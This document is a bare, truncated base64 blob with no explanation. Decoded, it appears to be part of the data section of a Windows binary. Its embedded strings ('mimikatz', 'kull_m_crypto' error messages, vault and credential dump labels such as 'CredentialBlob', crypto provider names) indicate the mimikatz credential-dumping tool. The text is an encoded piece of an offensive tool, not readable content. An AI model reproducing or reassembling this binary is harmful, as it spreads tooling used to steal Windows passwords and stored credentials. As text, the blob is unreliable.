AAAAROoFgAEAAAC4dguAAQAAAMB2C4ABAAAAFOwFgAEAAACw4gqAAQAAABB3C4ABAAAA6OwFgAEAAADQIQuAAQAAAFB3C4ABAAAApPQFgAEAAAAgiAuAAQAAADCIC4ABAAAAwPQFgAEAAABQiAuAAQAAAGCIC4ABAAAALPUFgAEAAADYiAuAAQAAAPCIC4ABAAAARPUFgAEAAACAiQuAAQAAAJCJC4ABAAAAXPUFgAEAAADIiQuAAQAAAOCJC4ABAAAArPUFgAEAAACA4wqAAQAAACCKC4ABAAAAIPYFgAEAAABoiguAAQAAAICKC4ABAAAAiPYFgAEAAADIiguAAQAAAOCKC4ABAAAA0PYFgAEAAAAkiwuAAQAAADCLC4ABAAAAnPcFgAEAAAB4iwuAAQAAAJCLC4ABAAAAmGULgAEAAADgkAuAAQAAAAAAAAAAAAAABAAAAAAAAABQhwmAAQAAAAAAAAAAAAAAAAAAAAAAAAComwuAAQAAALibC4ABAAAAAAAAAAAAAAAEAAAAAAAAALCHCYABAAAAAAAAAAAAAAAAAAAAAAAAAOCYC4ABAAAAAJkLgAEAAAAomQuAAQAAAEiZC4ABAAAAeJkLgAEAAACwmQuAAQAAAACaC4ABAAAAKCIKgAEAAAAIKQuAAQAAADihC4ABAAAAOPgFgAEAAACAfwqAAQAAAHiQC4ABAAAASPkFgAEAAACQkAuAAQAAAJiQC4ABAAAABPsFgAEAAACokAuAAQAAALCQC4ABAAAA6PwFgAEAAADAkAuAAQAAAMiQC4ABAAAA4P4FgAEAAAComguAAQAAALiaC4ABAAAAtP8FgAEAAACAfwqAAQAAAPCaC4ABAAAAyP8FgAEAAAAwmwuAAQAAAECbC4ABAAAAzAIGgAEAAABomwuAAQAAAHibC4ABAAAAAKELgAEAAAAYoQuAAQAAADihC4ABAAAAWKELgAEAAADMowuAAQAAANijC4ABAAAAAAAAAAAAAAABAAAAAAAAAGiICYABAAAAAAAAAAAAAAAAAAAAAAAAAAAGBoABAAAAIKMLgAEAAABAowuAAQAAAPhRCoABAAAAQKQLgAEAAAAAAAAAAAAAAAIAAAAAAAAAuIgJgAEAAAAsBgaAAQAAAJAHBoABAAAAsAcGgAEAAACAfwqAAQAAAIB/CoABAAAAwBIGgAEAAADQUQqAAQAAANBRCoABAAAACLcLgAEAAAAgtwuAAQAAAAAAAAAAAAAAAQAAAAAAAAAQigmAAQAAAAAAAAAAAAAAAAAAAAAAAAC+NQ4+dxvnQ7hzrtkBtidbOKULgAEAAAAAAAAAAAAAADh4nea1kclPidUjDU1MwrxYpQuAAQAAAAAAAAAAAAAA82+IPGkmokqo+z9nWad1SIClC4ABAAAAAAAAAAAAAAD1M+Cy3l8NRaG9N5H0ZXIMoKULgAEAAAC0DAaAAQAAACuhuLQ9GAhJlVm9i85ytYq4pQuAAQAAALQMBoABAAAAkXLI/vYUtkC9mH/yRZhrJuClC4ABAAAAtAwGgAEAAACjUEMdDTP5SrP/qSekWZis+KULgAEAAAAAAAAAAAAAADAxMjM0NTY3OC5GPyAhIQAYFwaAAQAAAPi2C4ABAAAA+LYLgAEAAAC4xQuAAQAAANDFC4ABAAAA8MULgAEAAAASAAAAAAAAAGCKCYABAAAAUCkGgAEAAAB0KQaAAQAAAMRpBoABAAAAAMELgAEAAAAIwQuAAQAAANhwBoABAAAAQMELgAEAAABQwQuAAQAAAJBVBoABAAAASIEKgAEAAACIwQuAAQAAAGRvBoABAAAAwMELgAEAAADQwQuAAQAAAFhoBoABAAAAAMILgAEAAAAQwguAAQAAAPxtBoABAAAASMILgAEAAABQwguAAQAAAIApBoABAAAAgMILgAEAAACgwguAAQAAANQoBoABAAAAeO8KgAEAAAAAwwuAAQAAAPAoBoABAAAAYMMLgAEAAACAwwuAAQAAANA+BoABAAAA4MMLgAEAAADowwuAAQAAAMAxBoABAAAACJUKgAEAAAAIxAuAAQAAAJQ2BoABAAAAGMQLgAEAAAAwxAuAAQAAAIw4BoABAAAA8AQLgAEAAABYxAuAAQAAAAg+BoABAAAAoAULgAEAAABwxAuAAQAAAOhVBoABAAAAsMQLgAEAAADAxAuAAQAAACRWBoABAAAA8MQLgAEAAAAAxQuAAQAAABBTBoABAAAAqFIKgAEAAABAxQuAAQAAABRRBoABAAAAcMULgAEAAACAxQuAAQAAAEDNC4ABAAAAaM0LgAEAAACAzQuAAQAAAJjNC4ABAAAAqM0LgAEAAAC4zQuAAQAAAMjNC4ABAAAA2M0LgAEAAADozQuAAQAAABDOC4ABAAAAMM4LgAEAAABYzguAAQAAAIDOC4ABAAAAsM4LgAEAAABQpwyAAQAAAKCpDIABAAAA4KoMgAEAAACwpgyAAQAAAOCjDIABAAAAsKgMgAEAAADgoAyAAQAAAJCgDIABAAAAEJ0MgAEAAACQoAyAAQAAAPwcBoABAAAACB8GgAEAAABQHwaAAQAAAJDCDIABAAAAiMIMgAEAAAAcIQaAAQAAAKAiBoABAAAAJCUGgAEAAAD4kwyAAQAAAACUDIABAAAAqAAAAAAAAAAQAAAAUAAAAFQAAAAYAAAAKAAAAHAAAABIAAAAoAAAAFgAAABgAAAAoAAAAAAAAAAQAAAAUAAAAFQAAAAYAAAAKAAAAHAAAABIAAAAmAAAAFgAAABgAAAAEAEAAAAAAABwAAAAuAAAALwAAACAAAAAkAAAANgAAACwAAAACAEAAMAAAADIAAAACAEAAAAAAABwAAAAuAAAALwAAACAAAAAkAAAANgAAACwAAAAAAEAAMAAAADIAAAAGAEAAAAAAABwAAAAyAAAAMwAAACQAAAAoAAAAOgAAADAAAAAEAEAANAAAADYAAAAUAEAAAAAAABwAAAAyAAAANgAAACAAAAAkAAAAPgAAADAAAAASAEAAOAAAADoAAAAYAEAAAAAAABwAAAA2AAAAOgAAACQAAAAoAAAAAgBAADQAAAAWAEAAPAAAAD4AAAAkAAAADgAAABoAAAAgAAAAAAAAAAIAAAAwAAAADgAAACYAAAAsAAAAAAAAAAIAAAA0AAAADgAAACoAAAAwAAAAAAAAAAIAAAA4KMMgAEAAABgAAAAmAAAAAgBAAAYAQAAKAEAADgBAABAAQAAAAAAACAAAAAoAAAAMAAAAEAAAABQAAAAYAAAAHAAAAB4AAAAgAAAAIgAAADIAAAA0AAAANgAAAAEAQAAEAEAAAgBAAAgAQAAAAAAAPgAAAAAAAAAGAAAAAAAAAAQAAAAAAAAACgAAAAAAAAANAAAAEgAAAA4AAAAAAAAAFAAAACIAAAA+AAAABABAAAoAQAAQAEAAEgBAAAAAAAAIAAAACgAAAAwAAAAQAAAAFAAAABgAAAAcAAAAIAAAACIAAAAkAAAALgAAADAAAAAyAAAAPQAAAAAAQAA+AAAABABAAAAAAAA6AAAAAAAAAAYAAAAAAAAABAAAAAAAAAAKAAAAAAAAAA0AAAASAAAADgAAAAAAAAAQAAAAHgAAADoAAAAAAEAABgBAAAwAQAAOAEAAAAAAAAgAAAAKAAAADAAAABAAAAAUAAAAGAAAABwAAAAgAAAAIgAAACQAAAAuAAAAMAAAADIAAAA9AAAAAABAAD4AAAAEAEAAAAAAADYAAAAAAAAACgAAAAAAAAAGAAAAAAAAAAwAAAAAAAAADgAAABYAAAAQAAAAAAAAABAAAAAeAAAAOgAAAAAAQAAGAEAADABAAA4AQAAAAAAACAAAAAoAAAAMAAAAEAAAABQAAAAYAAAAIAAAACQAAAAmAAAAKAAAADIAAAA0AAAANgAAAAEAQAAEAEAAAgBAAAgAQAAAAAAANgAAAAAAAAAKAAAAAAAAAAYAAAAAAAAADAAAAAAAAAAOAAAAFgAAABAAAAAAAAAAEAAAAB4AAAA6AAAAAABAAAYAQAAMAEAADgBAAAAAAAAIAAAACgAAAAwAAAAQAAAAFAAAABgAAAAgAAAAJAAAACYAAAAoAAAAMgAAADQAAAA2AAAAAQBAAAQAQAACAEAACABAAAAAAAA2AAAAAAAAAAoAAAAAAAAABgAAAAAAAAAMAAAAAAAAABAAAAAYAAAAEgAAAAAAAAASAAAAIgAAAAYAQAAMAEAAEgBAABgAQAAaAEAAAAAAAAgAAAAKAAAADAAAABAAAAAUAAAAGAAAACAAAAAkAAAAJgAAACgAAAAyAAAANAAAADYAAAABAEAABABAAAIAQAAIAEAAAAAAAAIAQAAAAAAACgAAAAAAAAAGAAAAAAAAAAwAAAAAAAAAEgAAABoAAAAUAAAAAAAAABIAAAAiAAAABgBAAAwAQAASAEAAGABAABoAQAAAAAAACAAAAAoAAAAMAAAAEAAAABQAAAAYAAAAJAAAACgAAAAqAAAALAAAADYAAAA4AAAAOgAAAAUAQAAIAEAABgBAAAwAQAAAAAAAAgBAAAAAAAAKAAAAAAAAAAYAAAAAAAAADAAAAAAAAAASAAAAGgAAABQAAAAAAAAAEgAAACIAAAAKAEAAEABAABYAQAAcAEAAHgBAAAAAAAAIAAAACgAAAAwAAAAQAAAAFAAAABgAAAAkAAAAKAAAACwAAAAuAAAAOgAAADwAAAA+AAAACQBAAAwAQAAKAEAAEABAAAAAAAAGAEAAAAAAAAoAAAAAAAAACAAAAAAAAAAOAAAAAAAAABIAAAAaAAAAFAAAAAAAAAAyOULgAEAAAD45QuAAQAAABjmC4ABAAAAsKYMgAEAAAAAAAAAEAAAAAAAAABUAAAAVQAAAFYAAAAAAAAAIAAAADAAAABAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAhAAAAIgAAACMAAAAAAAAAJgAAADYAAABGAAAAAAAAACQAAAAAAAAAEAAAACAAAAAhAAAAIgAAACMAAAAAAAAAKAAAADgAAABIAAAAAAAAACYAAAAAAAAAEAAAACgAAAApAAAAKgAAACsAAAAsAAAASgAAAFoAAABqAAAANgAAADQAAAAOAA8AAAAAAEjpC4ABAAAABwAIAAAAAABA6QuAAQAAAFCnDIABAAAAsKgMgAEAAABsAAAAiAAAAHAAAACIAAAAoKkMgAEAAADgqgyAAQAAAAAAAAAAAAAAJQAqAHMAKgAqAEMAUgBFAEQARQBOAFQASQBBAEwAKgAqAAoAAAAAACUAKgBzACAAIABjAHIAZQBkAEYAbABhAGcAcwAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAAAAAAAAAAAAAJQAqAHMAIAAgAGMAcgBlAGQAUwBpAHoAZQAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAAAAAAAAAAAAlACoAcwAgACAAYwByAGUAZABVAG4AawAwACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoACgAAAAAAAAAAAAAAAAAAACUAKgBzACAAIABUAHkAcABlACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUAIAAtACAAJQBzAAoAAAAAAAAAJQAqAHMAIAAgAEYAbABhAGcAcwAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAEwAYQBzAHQAVwByAGkAdAB0AGUAbgAgACAAIAAgADoAIAAAAAAACgAAAAAAAAAlACoAcwAgACAAdQBuAGsARgBsAGEAZwBzAE8AcgBTAGkAegBlACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAAAAAAAAAAACUAKgBzACAAIABQAGUAcgBzAGkAcwB0ACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUAIAAtACAAJQBzAAoAAAAAAAAAJQAqAHMAIAAgAEEAdAB0AHIAaQBiAHUAdABlAEMAbwB1AG4AdAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAAAAAAAAAAAAlACoAcwAgACAAdQBuAGsAMAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAAAAAAAAAAACUAKgBzACAAIAB1AG4AawAxACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABUAGEAcgBnAGUAdABOAGEAbQBlACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAAAAJQAqAHMAIAAgAFUAbgBrAEQAYQB0AGEAIAAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAAAAlACoAcwAgACAAQwBvAG0AbQBlAG4AdAAgACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAAAAAACUAKgBzACAAIABUAGEAcgBnAGUAdABBAGwAaQBhAHMAIAAgACAAIAA6ACAAJQBzAAoAAAAAAAAAJQAqAHMAIAAgAFUAcwBlAHIATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAAAAlACoAcwAgACAAQwByAGUAZABlAG4AdABpAGEAbABCAGwAbwBiACAAOgAgAAAAAAAlACoAcwAgACAAQQB0AHQAcgBpAGIAdQB0AGUAcwAgACAAIAAgACAAOgAgACUAdQAKAAAAAAAAACUAKgBzACoAKgBBAFQAVABSAEkAQgBVAFQARQAqACoACgAAAAAAAAAlACoAcwAgACAARgBsAGEAZwBzACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIABLAGUAeQB3AG8AcgBkACAAOgAgACUAcwAKAAAAAAAlACoAcwAgACAAVgBhAGwAdQBlACAAIAAgADoAIAAAACUAKgBzACoAKgBMAEUARwBBAEMAWQAgAEMAUgBFAEQARQBOAFQASQBBAEwAUwAgAEcAUgBPAFUAUAAqACoACgAAAAAAAAAAAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBWAGUAcgBzAGkAbwBuACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAAAAAAAAAAAAlACoAcwAgACAAcwB0AHIAdQBjAHQAUwBpAHoAZQAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAIAAgACAAOgAgACUAdQAKAAAAAAAAACUAKgBzACoAKgBMAEUARwBBAEMAWQAgAEMAUgBFAEQARQBOAFQASQBBAEwAKgAqAAoAAAAAAAAAAAAAAAAAAAAlACoAcwAgACAAYwByAGUAZABTAGkAegBlACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoACgAAAD8AAABnAGUAbgBlAHIAaQBjAAAAZABvAG0AYQBpAG4AXwBwAGEAcwBzAHcAbwByAGQAAABkAG8AbQBhAGkAbgBfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAAAAAAZABvAG0AYQBpAG4AXwB2AGkAcwBpAGIAbABlAF8AcABhAHMAcwB3AG8AcgBkAAAAZwBlAG4AZQByAGkAYwBfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAAAGQAbwBtAGEAaQBuAF8AZQB4AHQAZQBuAGQAZQBkAAAAbgBvAG4AZQAAAAAAAAAAAHMAZQBzAHMAaQBvAG4AAABsAG8AYwBhAGwAXwBtAGEAYwBoAGkAbgBlAAAAAAAAAGUAbgB0AGUAcgBwAHIAaQBzAGUAAAAAACUAKgBzACoAKgBWAEEAVQBMAFQAIABQAE8ATABJAEMAWQAqACoACgAAAAAAAAAAACUAKgBzACAAIAB2AGUAcgBzAGkAbwBuACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAJQAqAHMAIAAgAHYAYQB1AGwAdAAgACAAIAA6ACAAAAAlACoAcwAgACAATgBhAG0AZQAgACAAIAAgADoAIAAlAHMACgAAAAAAJQAqAHMAIAAgAHUAbgBrADAALwAxAC8AMgA6ACAAJQAwADgAeAAvACUAMAA4AHgALwAlADAAOAB4AAoAAAAAACUAKgBzACoAKgBWAEEAVQBMAFQAIABQAE8ATABJAEMAWQAgAEsARQBZACoAKgAKAAAAAAAAAAAAJQAqAHMAIAAgAHUAbgBrADAAIAAgADoAIAAAAAAAAAAlACoAcwAgACAAdQBuAGsAMQAgACAAOgAgAAAAAAAAACUAKgBzACoAKgBWAEEAVQBMAFQAIABDAFIARQBEAEUATgBUAEkAQQBMACoAKgAKAAAAAAAAAAAAJQAqAHMAIAAgAFMAYwBoAGUAbQBhAEkAZAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAAACUAKgBzACAAIAB1AG4AawAwACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAJQAqAHMAIAAgAEwAYQBzAHQAVwByAGkAdAB0AGUAbgAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAAACUAKgBzACAAIAB1AG4AawAxACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAJQAqAHMAIAAgAHUAbgBrADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAARgByAGkAZQBuAGQAbAB5AE4AYQBtAGUAIAAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAJQAqAHMAIAAgAGQAdwBBAHQAdAByAGkAYgB1AHQAZQBzAE0AYQBwAFMAaQB6AGUAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAAKgAgAEEAdAB0AHIAaQBiAHUAdABlACAAJQAzAHUAIABAACAAbwBmAGYAcwBlAHQAIAAlADAAOAB4ACAALQAgACUAdQAgACAAKAB1AG4AawAgACUAMAA4AHgAIAAtACAAJQB1ACkACgAAAAAAAAAAAAAAAAAAACUAKgBzACoAKgBWAEEAVQBMAFQAIABDAFIARQBEAEUATgBUAEkAQQBMACAAQQBUAFQAUgBJAEIAVQBUAEUAKgAqAAoAAAAAACUAKgBzACAAIABpAGQAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAJQAqAHMAIAAgAEkAVgAgACAAIAAgACAAIAA6ACAAAAAlACoAcwAgACAARABhAHQAYQAgACAAIAAgADoAIAAAACUAKgBzACoAKgBWAEEAVQBMAFQAIABDAFIARQBEAEUATgBUAEkAQQBMACAAQwBMAEUAQQBSACAAQQBUAFQAUgBJAEIAVQBUAEUAUwAqACoACgAAAAAAAAAlACoAcwAgACAAdgBlAHIAcwBpAG8AbgA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABjAG8AdQBuAHQAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAHUAbgBrACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAKgAgAAAAcgBlAHMAcwBvAHUAcgBjAGUAIAAgACAAIAAgADoAIAAAAAAAAAAAAGkAZABlAG4AdABpAHQAeQAgACAAIAAgACAAIAA6ACAAAAAAAAAAAABhAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByACAAOgAgAAAAAAAAAAAAcAByAG8AcABlAHIAdAB5ACAAJQAzAHUAIAAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBnAGUAbgBlAHIAaQBjAEEARQBTADEAMgA4AEQAZQBjAHIAeQBwAHQAIAA7ACAAQwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBnAGUAbgBlAHIAaQBjAEEARQBTADEAMgA4AEQAZQBjAHIAeQBwAHQAIAA7ACAAQwByAHkAcAB0AFMAZQB0AEsAZQB5AFAAYQByAGEAbQAgACgASQBWACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGkAYwBBAEUAUwAxADIAOABEAGUAYwByAHkAcAB0ACAAOwAgAEMAcgB5AHAAdABTAGUAdABLAGUAeQBQAGEAcgBhAG0AIAAoAE0ATwBEAEUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGcAZQBuAGUAcgBpAGMAQQBFAFMAMQAyADgARABlAGMAcgB5AHAAdAAgADsAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AaABrAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGcAZQBuAGUAcgBpAGMAQQBFAFMAMQAyADgARABlAGMAcgB5AHAAdAAgADsAIABDAHIAeQBwAHQAQQBjAHEAdQBpAHIAZQBDAG8AbgB0AGUAeAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABtAGkAbQBpAGsAYQB0AHoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAUABmAHgAIAA7ACAAUABGAFgARQB4AHAAbwByAHQAQwBlAHIAdABTAHQAbwByAGUARQB4ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBuAGgAYQBuAGMAZQBkACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAgAHYAMQAuADAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBEAGUAcgBBAG4AZABLAGUAeQBUAG8AUABmAHgAIAA7ACAAQwByAHkAcAB0AEkAbQBwAG8AcgB0AEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAEQAZQByAEEAbgBkAEsAZQB5AFQAbwBQAGYAeAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGQAZQBsAGUAdABlACAAdABlAG0AcAAgAGsAZQB5AHMAZQB0ACAAJQBzAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAEQAZQByAEEAbgBkAEsAZQB5AFQAbwBQAGYAeAAgADsAIABDAHIAeQBwAHQAQQBjAHEAdQBpAHIAZQBDAG8AbgB0AGUAeAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAEQAZQByAEEAbgBkAEsAZQB5AEkAbgBmAG8AVABvAFAAZgB4ACAAOwAgAEMAZQByAHQAUwBlAHQAQwBlAHIAdABpAGYAaQBjAGEAdABlAEMAbwBuAHQAZQB4AHQAUAByAG8AcABlAHIAdAB5ACgAQwBFAFIAVABfAEsARQBZAF8AUABSAE8AVgBfAEkATgBGAE8AXwBQAFIATwBQAF8ASQBEACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAEQAZQByAEEAbgBkAEsAZQB5AEkAbgBmAG8AVABvAFAAZgB4ACAAOwAgAEMAZQByAHQAQQBkAGQARQBuAGMAbwBkAGUAZABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVABvAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8ARABlAHIAQQBuAGQASwBlAHkASQBuAGYAbwBUAG8AUwB0AG8AcgBlACAAOwAgAEMAZQByAHQAUwBlAHQAQwBlAHIAdABpAGYAaQBjAGEAdABlAEMAbwBuAHQAZQB4AHQAUAByAG8AcABlAHIAdAB5ACgAQwBFAFIAVABfAEsARQBZAF8AUABSAE8AVgBfAEkATgBGAE8AXwBQAFIATwBQAF8ASQBEACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8ARABlAHIAQQBuAGQASwBlAHkASQBuAGYAbwBUAG8AUwB0AG8AcgBlACAAOwAgAEMAZQByAHQAQQBkAGQARQBuAGMAbwBkAGUAZABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVABvAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAAAAAABDAEUAUgBUAF8AUwBZAFMAVABFAE0AXwBTAFQATwBSAEUAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBfAEcAUgBPAFUAUABfAFAATwBMAEkAQwBZAAAAAAAAAAAAAABDAEUAUgBUAF8AUwBZAFMAVABFAE0AXwBTAFQATwBSAEUAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBfAEcAUgBPAFUAUABfAFAATwBMAEkAQwBZAAAAAAAAAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBfAEUATgBUAEUAUgBQAFIASQBTAEUAAAAAAAAAAAAAAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AQwBVAFIAUgBFAE4AVABfAFMARQBSAFYASQBDAEUAAAAAAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AVQBTAEUAUgBTAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AUwBFAFIAVgBJAEMARQBTAAAAAABNAFMAXwBEAEUARgBfAFAAUgBPAFYAAAAAAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBhAHMAZQAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAIAB2ADEALgAwAAAAAABNAFMAXwBFAE4ASABBAE4AQwBFAEQAXwBQAFIATwBWAAAAAAAAAAAATQBTAF8AUwBUAFIATwBOAEcAXwBQAFIATwBWAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAFMAdAByAG8AbgBnACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAE0AUwBfAEQARQBGAF8AUgBTAEEAXwBTAEkARwBfAFAAUgBPAFYAAAAAAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUgBTAEEAIABTAGkAZwBuAGEAdAB1AHIAZQAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAE0AUwBfAEQARQBGAF8AUgBTAEEAXwBTAEMASABBAE4ATgBFAEwAXwBQAFIATwBWAAAAAAAAAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAFIAUwBBACAAUwBDAGgAYQBuAG4AZQBsACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAAAAAABNAFMAXwBEAEUARgBfAEQAUwBTAF8AUABSAE8AVgAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBhAHMAZQAgAEQAUwBTACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAAAAAABNAFMAXwBEAEUARgBfAEQAUwBTAF8ARABIAF8AUABSAE8AVgAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAARABTAFMAIABhAG4AZAAgAEQAaQBmAGYAaQBlAC0ASABlAGwAbABtAGEAbgAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAAAAAABNAFMAXwBFAE4ASABfAEQAUwBTAF8ARABIAF8AUABSAE8AVgAAAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAbgBoAGEAbgBjAGUAZAAgAEQAUwBTACAAYQBuAGQAIABEAGkAZgBmAGkAZQAtAEgAZQBsAGwAbQBhAG4AIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByAAAAAAAAAAAATQBTAF8ARABFAEYAXwBEAEgAXwBTAEMASABBAE4ATgBFAEwAXwBQAFIATwBWAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAEQASAAgAFMAQwBoAGEAbgBuAGUAbAAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAAAAAABNAFMAXwBTAEMAQQBSAEQAXwBQAFIATwBWAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBhAHMAZQAgAFMAbQBhAHIAdAAgAEMAYQByAGQAIABDAHIAeQBwAHQAbwAgAFAAcgBvAHYAaQBkAGUAcgAAAAAAAABNAFMAXwBFAE4ASABfAFIAUwBBAF8AQQBFAFMAXwBQAFIATwBWAF8AWABQAAAAAAAAAAAAAAAAAE0AaQ